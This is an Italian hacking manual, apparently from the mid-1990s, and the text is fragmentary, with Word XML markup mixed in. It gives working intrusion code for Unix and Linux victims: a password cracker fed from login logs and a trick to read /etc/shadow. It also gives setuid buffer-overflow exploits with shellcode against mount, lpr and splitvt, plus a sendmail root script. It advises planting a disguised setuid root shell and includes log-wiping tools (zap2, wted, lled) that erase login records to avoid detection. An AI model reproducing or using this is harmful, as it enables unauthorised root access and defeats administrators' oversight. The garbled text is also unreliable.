file,abbiam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a buona password da mettere in crackerjack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co uno script per facilitare le cose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ER IL FILE BINDWAREZ BY QUANTUM: lo troverai alla file del testo nell'appendic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LE UUENCODAT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!/bin/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Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0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/var/log/messages is world readable. If a user types in his password a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the login prompt, it may get logged to /var/log/messag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I could swear this topic has been beaten to death, but I still see thi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problem on every linux box I have access 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Dave G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12/06/96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&lt;daveg@escape.com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http://www.escape.com/~dave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Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$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grep "LOGIN FAILURE" /var/log/messages | cut -d',' -f2 | cut -c2- | sort | uniq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&gt;&gt; /tmp/messages.dict.$$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[ ! -e ./scrack ]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e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echo "Creating scrack.c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at &lt;&lt; ! &gt; scrack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unistd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pwd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ys/types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get_salt( d, s ) strncpy( d, s, 2 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n(argc,argv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argc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*argv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truct passwd *pwd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ILE *f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har buff[80], salt[3], *encrypted_string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f ( ( fp = fopen( argv[1], "r" ) ) == NULL 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fprintf( stderr, "Couldnt find dict file\n" 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exit(1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while ( fgets( buff, 80, fp ) != NULL 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setpwent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buff[strlen(buff)-1]='\0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while ( ( pwd = getpwent() ) != NULL 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if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 &amp;&a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( strlen( (*pwd).pw_passwd ) == 13 ) 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get_salt(salt, (*pwd).pw_passwd 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encrypted_string = crypt( buff, salt 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if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>fflush(stdou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echo "Creating scrack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c -O6 -fomit-frame-pointer -s -o scrack scrack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./scrack /tmp/messages.dict.$$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cho /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them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yourself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3B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vellin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ncora un altro posto dove trovare passwd files. Basta seguire le istruzion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ella sezione 2B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3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ttenere i shadow passwd fil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s'e'un shadow passwd file?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iamo il passwd file qui sotto per mostrare come apparirebbe se lo editassi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:x:0:0:root:/root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in:x:1:1:bin:/bi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emon:x:2:2:daemon:/sbi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dm:x:3:4:adm:/var/adm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p:x:4:7:lp:/var/spool/lpd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nc:x:5:0:sync:/sbin:/bin/syn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hutdown:x:6:0:shutdown:/sbin:/sbin/shutdow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alt:x:7:0:halt:/sbin:/sbin/hal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l:x:8:12:mail:/var/spool/mail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ws:x:9:13:news:/usr/lib/news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ucp:x:10:14:uucp:/var/spool/uucppublic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perator:x:11:0:operator:/root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ames:x:12:100:games:/usr/games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n:x:13:15:man:/usr/ma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stmaster:x:14:12:postmaster:/var/spool/mail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body:x:-2:100:nobody:/dev/null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tp:x:404:1::/home/ftp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uest:x:405:100:guest:/dev/null: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hilton:x:501:100:Bob Hilton:/home/bhilton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eb:x:502:100:Web Master:/home/web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ry:x:503:100:Mary C. Hilton:/home/mary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anca qualcosa? Yup, le password criptate. Se ottieni accesso di root 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assword criptate sono in /etc/shadow. Alcuni Admin nasconderanno il shadow fil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 qualche directory da qualche parte, ma perlopiu' lo troverai in /etc. Altr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hadow programs lo potranno mettere nel file master.passwd. Ma se ottieni i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access, dai una occhiata in gir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ciamo che hai un accesso alla macchina ma non riesci ad accedere a roo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n e'un problema se stanno usando libc 5.4.7, e in questo mometo molti l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anno! Almeno uno di questi file ha permessi di suid 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ing, traceroute, rlogin, oppure, s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. Digita bash o sh per lanciare una she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. Digita export RESOLV_HOST_CONF=/etc/shado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. Digita uno dei nomi dei file qui sopra con asdf ,in questo mod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ing asd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ovrebbe trovare il shadow passwd file per te ,se funziona. Sembra ch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unzioni sulla maggioranza dei sistemi attualment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ta: Puoi sostituire /etc/passwd con qualunque file posseduto da ROOT che tu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glia legge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cco un veloce script che puoi lanciare su qualunque file per rendere il tut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iu' semplic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cb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* RCB Phraser - therapy in '96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Limits: Linux only, no binary fil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little personal message to the world: FUCK CENSORSHIP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getjunk(const char *filetocat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 setenv("RESOLV_HOST_CONF",filetocat,1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ystem("ping xy 1&gt; /dev/null 2&gt; phrasing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unsetenv("RESOLV_HOST_CONF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main(argc,argv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argc; char **argv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 char buffer[200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har *gag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ILE *deve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((argc==1) || !(strcmp(argv[1],"-h")) || !(strcmp(argv[1],"--help"))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{ printf("RCB Phraser - junked by THERAPY\n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f("Usage: %s [NO OPTIONS] [FILE to cat]\n\n",argv[0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exit(1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getjunk(argv[1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gag=buffe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gag+=1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devel=fopen("phrasing","rb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while(!feof(devel)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{ fgets(buffer,sizeof(buffer),devel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(strlen(buffer)&gt;24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{ strcpy(buffer+strlen(buffer)-24,"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fputs(gag,stdou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close(devel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move("phrasing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iga di comando: rcb /etc/shadow o qualunque altro file sul sistema che non puo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eggere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3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ttenere /etc/hos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olo una precauzione, qualche volta ti servira' sapere cosa siano i vari sistem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ell'host file, o cosa siano tutti gli indirizzi ip o i differenti domini ne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istema. Assicurati di recuperare il file /etc/hosts per maggiori informazion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cui potresti aver bisogno in futur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IV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uadagna l'account di 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e ho detto prima, nella maggior parte dei casi, tutto cio' che hai bisogno e'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 account e se non riesci ad averlo potresti scambiarlo con qualcuno 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alche IRC (c'e' sempre qualcuno che vuole farsi notare). In questo manuale c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ono info sufficienti e se nonostante questo non riesci a guadagnare l'account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i root vuol dire che quel sistema e' sicuro e lo sara' probabilmente anche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utur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a non scoraggiarti. Puoi sempre tenere le informazioni su quel sistema d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rte,scrivere qualche appunto e aspettare che esca qualche nuovo exploi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erca di stare fuori dal sistema fino a quel momento in modo da non perd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account. Ricorda che quando ti logghi in un account e non hai i permess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root, non puoi cancellare i file di log, quindi quando l'utente proprietari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ll'account si logghera' a sua volta vedra' un messaggio che dic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st login from xxx.com time:0:00 date:xx/xx/x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 questo modo potrebbe scoprire che qualcuno si e' loggato col suo accoun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4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ug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i sono molti bug nei programmi di un sistema che ti permettono di ave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'accesso a root. Puo' essere un gioco installato sul sistema oppure il sendmail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loro non aggiornano il sistema con nuove patch stai pur certo che prima o po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ntri dentro come roo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sieme a questo manuale noi della IHS abbiamo riportato molti exploit per UNIX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P-UNIX e Linux. (ce ne sara' uno che funziona...)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i raccomando finisci di leggere il manuale prima di iniziare una intrusion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ltrimenti rischi di farti beccare oppure di restare nel sistema per lung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empo senza combinare null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4B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xploi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desso presentiamo alcuni exploit molto comuni che in un sistema appena decen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n funzioneranno. Il nostro intento, pero', e' quello di farvi vedere com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unziona un exploit e questi esempi ci parevano molto istruttiv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mount/mount explo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erca nella directory /bin un file chiamato umount(o mount),se non lo trovi cercal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l sistema cosi'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nd / -name umount -print -xdev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ai nella directory dove si trova il file e digit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s -al um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questo file ha permessi suid allora probabilmente diventerai roo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 permessi suid sono: rws per il proprietario che e' root. Praticamen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si'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ictim:/bin# ls -al um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sr-sr-x   1 root         8888 Mar 21  1995 um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ictim:/bin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ssiamo diventare root compilando il file qui sott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mount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* sno.c : Linux realpath explo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Syntax: ./sno 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*         mount $WOOT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   OR  umount $W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N is some number which seems to differ between 4 &amp; 8, if your number i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too big, you will get a mount error, if it is too small, it will se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fault.  Figure it out.  (Sometimes N=0 for mount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* If you use mount, first thing to do once you get the root shell is rm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* /etc/mtab~, if this file exists you can't root with mount until it is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remove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*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                                         -ReDrago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SIZE 1024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long get_esp(void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__asm__("movl %esp,%eax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main(int argc, char **argv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har env[SIZE+4+1]; /* 1024 buffer + 4 byte return address + null byte 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nt a,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har *pt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long *addr_pt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har execshell[] =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"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f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"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd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"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh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har *exec_ptr = execshel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 xml:space="preserve">r=atoi(argv[1]);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tr = env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memcpy(ptr,"WOOT=",5); /* set environment variable to use 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 xml:space="preserve">ptr += 5;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or(a=0;a&lt;SIZE+4-strlen(execshell)-r;a++)  /* pad front with NOPs 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*(ptr++) = 0x9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while (*exec_ptr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*(ptr++) = *(exec_ptr++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addr_ptr = (long *)pt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*(addr_ptr++) = get_esp()+1139;  /* 0xbffffc01 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 xml:space="preserve">ptr = (char *) addr_ptr;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*ptr = 0; /* must end with null byte to terminate string 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utenv(env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ystem("/bin/mount $WOOT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 compilare il file nella macchina vittima digita : gcc umount.c -o um (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e vuoi chiamarlo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 questo modo creerai un file chiamato um che puoi eseguire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 questo exploit devi dare un numero com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./um 0 oppure ./um 4 .... fino all'8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fallisci potresti provare lpr. Cerca in /usr/bin lpr e controlla se ha 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messi suid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s -l lp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 ha i permessi suid... Usa questo scrip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pr.linux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lib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unistd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DEFAULT_OFFSET          5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BUFFER_SIZE             1023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ng get_esp(void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__asm__("movl %esp,%eax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main(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har *buff = NUL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unsigned long *addr_ptr = NUL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har *ptr = NUL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u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>"\xd7\xff\xff\xff/bin/sh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nt i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buff = malloc(4096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f(!buff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printf("can't allocate memory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exit(0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tr = buf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memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell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tr += BUFFER_SIZE-strlen(execshell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or(i=0;i &lt; strlen(execshell);i++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*(ptr++) = execshell[i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addr_ptr = (long *)pt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or(i=0;i&lt;2;i++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*(addr_ptr++) = get_esp() + DEFAULT_OFFSE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tr = (char *)addr_pt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*ptr = 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execl("/usr/bin/lpr", "lpr", "-C", buff, NULL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a e' la versione per BS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pr.bsd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---------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lib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unistd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DEFAULT_OFFSET          5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BUFFER_SIZE             1023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ng get_esp(void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__asm__("movl %esp,%eax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main(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har *buff = NUL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unsigned long *addr_ptr = NUL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har *ptr = NUL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har execshell[] =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"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f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"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52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"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01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"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04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nt i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buff = malloc(4096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f(!buff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printf("can't allocate memory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exit(0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tr = buf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memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell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tr += BUFFER_SIZE-strlen(execshell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or(i=0;i &lt; strlen(execshell);i++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*(ptr++) = execshell[i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addr_ptr = (long *)pt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or(i=0;i&lt;2;i++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*(addr_ptr++) = get_esp() + DEFAULT_OFFSE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tr = (char *)addr_pt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*ptr = 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execl("/usr/bin/lpr", "lpr", "-C", buff, NULL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desso basta compilarlo a fare: chmod nomeprg +x ed eseguirl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sserva il proprietario del gruppo. Tutti i file che copierai avrann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e proprietario lp, assicurati di cambiare il gruppo di ogni file ch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crivi.(chgrp root filename). Conrolla sempre il proprietario con ls -l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' una buona idea utilizzare questo exploit SOLO per guadagnare l'access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me root, dopodiche' basta copiare bash o sh (o quella che vuoi) con u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ltro nome da qualche altra parte e renderla root con suid di root. Po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gita chmod nomefile +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 questo modo in futuro avrai accesso come root con gid e uid di root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nza usare l'lp. Assicurati di rinominare la shell in modo tale da farl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mbrare un processo di sistema (se l'amministratore controlla che process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root stanno girando, non si deve accorgere della nostra shell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 un altro exploit che agisce su /usr/bin/splitv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questo comando ha i permessi suid compila il programma qui sott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p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           Avalon Security Researc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</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    Release 1.3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</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     (splitvt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Affected Program: splitvt(1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Affected Operating Systems: Linux 2-3.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Exploitation Result: Local users can obtain superuser privileg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Bug Synopsis: A stack overflow exists via user defined unbounds check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* user supplied data sent to a sprintf()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* Syntax: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crimson~$ cc -o sp sp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crimson~$ s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bash$ s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bash$ splitv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bash# whoam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Credit: Full credit for this bug (both the research and the cod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goes to Dave G. &amp; Vic M.  Any questions should be directed t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* mcpheea@cadvision.com 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 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ng get_esp(void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__asm__("movl %esp,%eax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n(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har eggplant[2048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nt a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har *egg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long *egg2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har realegg[] =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\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f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\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd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\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh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har *eggie = realegg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gg = eggplan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*(egg++) = 'H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*(egg++) = 'O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*(egg++) = 'M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*(egg++) = 'E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*(egg++) = '=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gg2 = (long *)egg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 (a=0;a&lt;(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x3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gg=(char *)egg2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 (a=0;a&lt;0x40;a++) *(egg++) = 0x9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while (*eggi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*(egg++) = *(eggie++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*egg = 0; /* terminate eggplant! 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utenv(eggplan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ystem("/bin/bash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, slitvt lavora in questo mod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. Complia il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. Fai girare il file s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. Lancia splitv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ma di lanciare splitvt digita:</w:t>
        <w:tab/>
        <w:t>whoam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ab/>
        <w:t>userna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po che hai lanciato l'exploit digita:</w:t>
        <w:tab/>
        <w:t>whoam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ab/>
        <w:t>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desso se non sei riuscito ad avere root, prova con sm.sh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 un bug di sendmail che funziona con la versione 8.73 fino all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8.83 (forse anche altre)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 lo script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m.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  'main()                                                '&gt;&gt;smtpd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  '{                                                     '&gt;&gt;smtpd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  '  setuid(0); setgid(0);                               '&gt;&gt;smtpd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  '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '&gt;&gt;smtpd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  '}                                                     '&gt;&gt;smtpd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  'main()                                                '&gt;&gt;leshka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  '{                                                     '&gt;&gt;leshka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  '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '&gt;&gt;leshka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ho   '}                                                     '&gt;&gt;leshka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c -o leshka leshka.c;cc -o /tmp/smtpd smtpd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./leshk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kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]"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\n"|head -n 1`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m leshka.c leshka smtpd.c /tmp/smtp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d /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po aver scritto lo script digit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mod +x sm.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. Lancia il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. Esso ti porta nella directory /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. Digita ls -l e controlla se c'e' un file sh con suid, e se c'e' digit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whoami, se non sei root lancia il file ./sh, adesso controlla s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ei root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esti sono solo alcuni. Allegato a questo manuale e' presente il libr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gli exploit che potrete utilizzare per avere accessi di root o altro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uon divertimen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V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enditi invisib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esti stuff servono per mantenere l'acesso a piu' punti di informazion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ssibil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fai delle stupidate, o non riesci a cancellare i tuoi wtmp, xferlog, ecc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uoi perdre l'accesso al sistema. Quindi devi assolutamente imparare co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unziona ogni sistema che hacker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venta parte del sistema, e prendi nota se stai lavorando su piu' sistemi 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a volta sola. Ma ricorda, costruisciti una routine ed evita di perdre temp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el cancellare le tue tracce. Non sbagliare a cancellare le tue tracce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ltrimenti rischi di perdere l'accesso e di farti becca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5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Zap2 (per wtmp/lastlog/utmp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i sono diversi programmi che cancellano le tue tracce, ma il migliore second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e e' zap2. Il mio l'ho compilato chiamandolo z2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z2 viene lanciato non appena hai guadagnato l'accesso a roo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otresti voler fare un finger @host.xxx per vedere chi e' collegato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uardare l'idle time di root o degli account dell'amministratore per ved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stanno facendo qualcos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gati e non appena sei dentro digita w, per vedere l'idle time di chi c'e', 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temporaneamente lancia il comando per avere l'accesso a root ch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vrai nacosto in qualche directory nidificata. Non appena avrai l'accesso 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, digita ./z2 usernam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desso sei al sicuro. Digita w pe rassicurarti che non ci sei. Se devi fa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tp o altre cose devi usare altri programmi che ho incluso nella prossi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chiamati wted e lle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a continuiamo con z2. Devi vedere dove si trovano tutti i file di log ne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stema ed editare z2.c in modo da includere la giusta locazione dei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WTMP_NAME "/usr/adm/wtmp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UTMP_NAME "/etc/utmp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LASTLOG_NAME "/usr/adm/lastlog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lla magior parte dei sistemi in cui sono entrato eran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WTMP_NAME "/var/adm/wtmp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UTMP_NAME "/var/adm/utmp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LASTLOG_NAME "/var/adm/lastlog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ppure in /bvar/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 il sorgente di zap2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ys/types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unistd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ys/file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fcntl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utmp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pwd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lastlog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WTMP_NAME "/usr/adm/wtmp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UTMP_NAME "/etc/utmp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LASTLOG_NAME "/usr/adm/lastlog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kill_utmp(who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who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struct utmp utmp_en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(f=open(UTMP_NAME,O_RDWR))&gt;=0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while(read (f, &amp;utmp_ent, sizeof (utmp_ent))&gt; 0 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if (!strncmp(utmp_ent.ut_name,who,strlen(who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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>bzero((char *)&amp;utmp_ent,sizeof( utmp_ent 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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>lseek (f, -(sizeof (utmp_ent)), SEEK_CUR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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>write (f, &amp;utmp_ent, sizeof (utmp_ent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lose(f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kill_wtmp(who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who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struct utmp utmp_en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ong pos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os = 1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(f=open(WTMP_NAME,O_RDWR))&gt;=0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while(pos != -1L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lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND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if (read (f, &amp;utmp_ent, sizeof (struct utmp))&lt;0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pos = -1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} els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if (!strncmp(utmp_ent.ut_name,who,strlen(who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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>bzero((char *)&amp;utmp_ent,sizeof(struct utmp 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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>write (f, &amp;utmp_ent, sizeof (utmp_ent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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>pos = -1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} else pos += 1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close(f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kill_lastlog(who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who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struct passwd *pwd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struct lastlog newll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if ((pwd=getpwnam(who))!=NULL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if ((f=open(LASTLOG_NAME, O_RDWR)) &gt;= 0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lseek(f, (long)pwd-&gt;pw_uid * sizeof (struct lastlog), 0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bzero((char *)&amp;newll,sizeof( newll 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write(f, (char *)&amp;newll, sizeof( newll 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close(f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 else printf("%s: ?\n",who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n(argc,argv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argc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argv[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argc==2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kill_lastlog(argv[1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kill_wtmp(argv[1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kill_utmp(argv[1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printf("Zap2!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 els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f("Error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5B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ltri scrip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po che ti sei connesso e hai lanciato z2, potresti aver bisogno di fare u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tp per prendere qualche file. (RICORDA, MAI ftp o telnet al di fuori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, per fare un ftp dentro o un login in un altro account nel sistema dev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are wted. Wted editera' il wtmp per rimuovere i tuoi login dall'ftp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vi usare anche lled (lastlog edit) per essere al sicur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 il men- che appare se digiti ./wted, dopo aver settato il path dei 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aver compilat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8:25pm][/home/compile]wt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age: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c 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-h      This hel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-f      Use FILE instead of defaul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-a      Show all entries foun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-u      Show all entries for US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-b      Show NULL entri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-e      Erase USER completel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-c      Erase all connections containing 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-z      Show ZAP'd entri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-x      Attempt to remove ZAP'd entries completel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indi se faccio un ftp come utente tsmith dovro' digitare wted -x -e tsmit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programma ti chiedera' per ogni log di tsmith se vuoi cancellarlo. Dopo ch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hai cancellato il tuo login , assicurati di chmod 644 il file wtmp.tmp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piarlo sopra il file wtmp nella directory di log. Puoi farlo in questo mod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. chmod 644 wtmp.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. cp wtmp.tmp /var/adm/w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 il wted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SSICURATI DI INSERIRE IL PATH CORRETTO dei file sottoindicati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ted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utmp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time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fcntl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file="/var/adm/wtmp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n(argc,argv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argc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argv[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i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(argc==1) usage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or(i=1;i&lt;argc;i++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if(argv[i][0] == '-'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switch(argv[i][1]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b': printents(""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z': printents("Z4p"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e': erase(argv[i+1],0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c': erase(0,argv[i+1]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f': file=argv[i+1]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u': printents(argv[i+1]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a': printents("*"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x': remnull(argv[i+1]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default:usage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ents(nam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name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ruct utmp utmp,*pt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fp=-1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tr=&amp;ut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(fp=open(file,O_RDONLY)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while (read(fp,&amp;utmp,sizeof(struct utmp))==sizeof(struct utmp)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if ( !(strcmp(name,ptr-&gt;ut_name)) || (name=="*") ||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(!(strcmp("Z4p",name)) &amp;&amp; (ptr-&gt;ut_time==0))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printinfo(ptr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close(fp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info(ptr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ruct utmp *pt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tmpstr[256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%s\t",ptr-&gt;ut_nam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%s\t",ptr-&gt;ut_lin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rcpy(tmpstr,ctime(&amp;(ptr-&gt;ut_time)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mpstr[strlen(tmpstr)-1]='\0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%s\t",tmpstr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%s\n",ptr-&gt;ut_hos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rase(name,host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name,*hos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fp=-1,fd=-1,tot=0,cnt=0,n=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ruct utmp ut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signed char c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(fp=open(file,O_RDONLY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fd=open("wtmp.tmp",O_WRONLY|O_CREA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while (read(fp,&amp;utmp,sizeof(struct utmp))==sizeof(struct utmp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if (host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if (strstr(utmp.ut_host,host)) to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else {cnt++;write(fd,&amp;utmp,sizeof(struct utmp));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if (name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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>if (strcmp(utmp.ut_name,name)) {c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write(fd,&amp;utmp,sizeof(struct utmp));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 xml:space="preserve">else {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if (n&gt;0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n--;c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write(fd,&amp;utmp,sizeof(struct utmp));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els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printinfo(&amp;utmp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printf("Erase entry (y/n/f(astforward))? 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='a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while (c!='y'&amp;&amp;c!='n'&amp;&amp;c!='f') c=getc(stdin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if (c=='f'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c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write(fd,&amp;utmp,sizeof(struct utmp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printf("Fast forward how many entries? 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scanf("%d",&amp;n);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if (c=='n'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c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write(fd,&amp;utmp,sizeof(struct utmp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if (c=='y') to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 xml:space="preserve">}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 xml:space="preserve">      }</w:t>
        <w:tab/>
        <w:t>}</w:t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close(fp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close(fd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Entries stored: %d Entries removed: %d\n",cnt,to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Now chmod wtmp.tmp and copy over the original %s\n",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emnull(nam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name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fp=-1,fd=-1,tot=0,cnt=0,n=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ruct utmp ut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(fp=open(file,O_RDONLY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fd=open("wtmp.tmp",O_WRONLY|O_CREA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while (read(fp,&amp;utmp,sizeof(struct utmp))==sizeof(struct utmp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if (utmp.ut_time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write(fd,&amp;utmp,sizeof(struct utmp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els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to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close(fp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close(fd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Entries stored: %d Entries removed: %d\n",cnt,to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Now chmod wtmp.tmp and copy over the original %s\n",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age(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Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST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h\tThis help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f\tUse FILE instead of default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a\tShow all entries found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u\tShow all entries for USER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rintf("\t-b\tShow NULL entries\n");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e\tErase USER completely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c\tErase all connections containing HOST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z\tShow ZAP'd entries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x\tAttempt to remove ZAP'd entries completely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isogna, pero', eliminare anche i riferimenti nel file /var/adm/last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 far cio' si usa lled.c. Compila il programma e chiamalo ll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 il men- che appare chiamando ./ll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4:04am][/home/paris/compile]ll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age: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c 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h      This hel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f      Use FILE instead of defaul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a      Show all entries foun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u      Show all entries for US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b      Show NULL entri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e      Erase USER completel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c      Erase all connections containing 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z      Show ZAP'd entri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x      Attempt to remove ZAP'd entries completel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l'host dal quale ti sei collegato si chiama machine.edit.com, digit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led -e username -c machine.ed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hai bisogno di vedere il riferimento al tuo host nel logfile (dovrebb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sere alla fine del file) digita: lled -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mod il file lastlog.tmp a 644 e copia il file sopra il lastlog nell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ectory di log come hai fatto per wte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SSICURATI di cambiare il path del last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 lled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time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lastlog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fcntl.h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file="/var/adm/lastlog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n(argc,argv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argc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argv[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i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(argc==1) usage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or(i=1;i&lt;argc;i++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if(argv[i][0] == '-'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switch(argv[i][1]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b': printents(""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z': printents("Z4p"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e': erase(argv[i+1]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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>case 'c': erase(0,argv[i+1]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f': file=argv[i+1]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u': printents(argv[i+1]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a': printents("*"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ase 'x': remnull(argv[i+1]); brea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default:usage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ents(nam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name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ruct lastlog utmp,*pt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fp=-1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tr=&amp;ut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(fp=open(file,O_RDONLY)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while (read(fp,&amp;utmp,sizeof(struct lastlog))==sizeof(struct lastlog)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if ( !(strcmp(name,ptr-&gt;ll_line)) || (name=="*") ||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(!(strcmp("Z4p",name)) &amp;&amp; (ptr-&gt;ll_time==0))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printinfo(ptr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close(fp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info(ptr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ruct lastlog *pt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tmpstr[256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%s\t",ptr-&gt;ll_lin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rcpy(tmpstr,ctime(&amp;(ptr-&gt;ll_time)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mpstr[strlen(tmpstr)-1]='\0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%s\t",tmpstr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%s\n",ptr-&gt;ll_hos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rase(name,host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name,*hos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fp=-1,fd=-1,tot=0,cnt=0,n=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ruct lastlog ut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signed char c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(fp=open(file,O_RDONLY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fd=open("lastlog.tmp",O_WRONLY|O_CREA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while (read(fp,&amp;utmp,sizeof(struct lastlog))==sizeof(struct lastlog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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>if (host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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>if (strstr(utmp.ll_host,host)) to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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>else {cnt++;write(fd,&amp;utmp,sizeof(struct lastlog));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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>if (name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if (strcmp(utmp.ll_line,name)) {c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write(fd,&amp;utmp,sizeof(struct lastlog));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 xml:space="preserve">else {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if (n&gt;0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n--;c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write(fd,&amp;utmp,sizeof(struct lastlog));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els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printinfo(&amp;utmp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printf("Erase entry (y/n/f(astforward))? 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='a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while (c!='y'&amp;&amp;c!='n'&amp;&amp;c!='f') c=getc(stdin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if (c=='f'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c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write(fd,&amp;utmp,sizeof(struct lastlog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printf("Fast forward how many entries? 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scanf("%d",&amp;n);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if (c=='n'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c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write(fd,&amp;utmp,sizeof(struct lastlog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if (c=='y') to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 xml:space="preserve">}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 xml:space="preserve">      }</w:t>
        <w:tab/>
        <w:t>}</w:t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close(fp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close(fd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Entries stored: %d Entries removed: %d\n",cnt,to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Now chmod lastlog.tmp and copy over the original %s\n",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emnull(nam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*name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fp=-1,fd=-1,tot=0,cnt=0,n=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ruct lastlog ut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(fp=open(file,O_RDONLY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fd=open("lastlog.tmp",O_WRONLY|O_CREA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while (read(fp,&amp;utmp,sizeof(struct lastlog))==sizeof(struct lastlog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if (utmp.ll_time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c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write(fd,&amp;utmp,sizeof(struct lastlog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>els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ab/>
        <w:tab/>
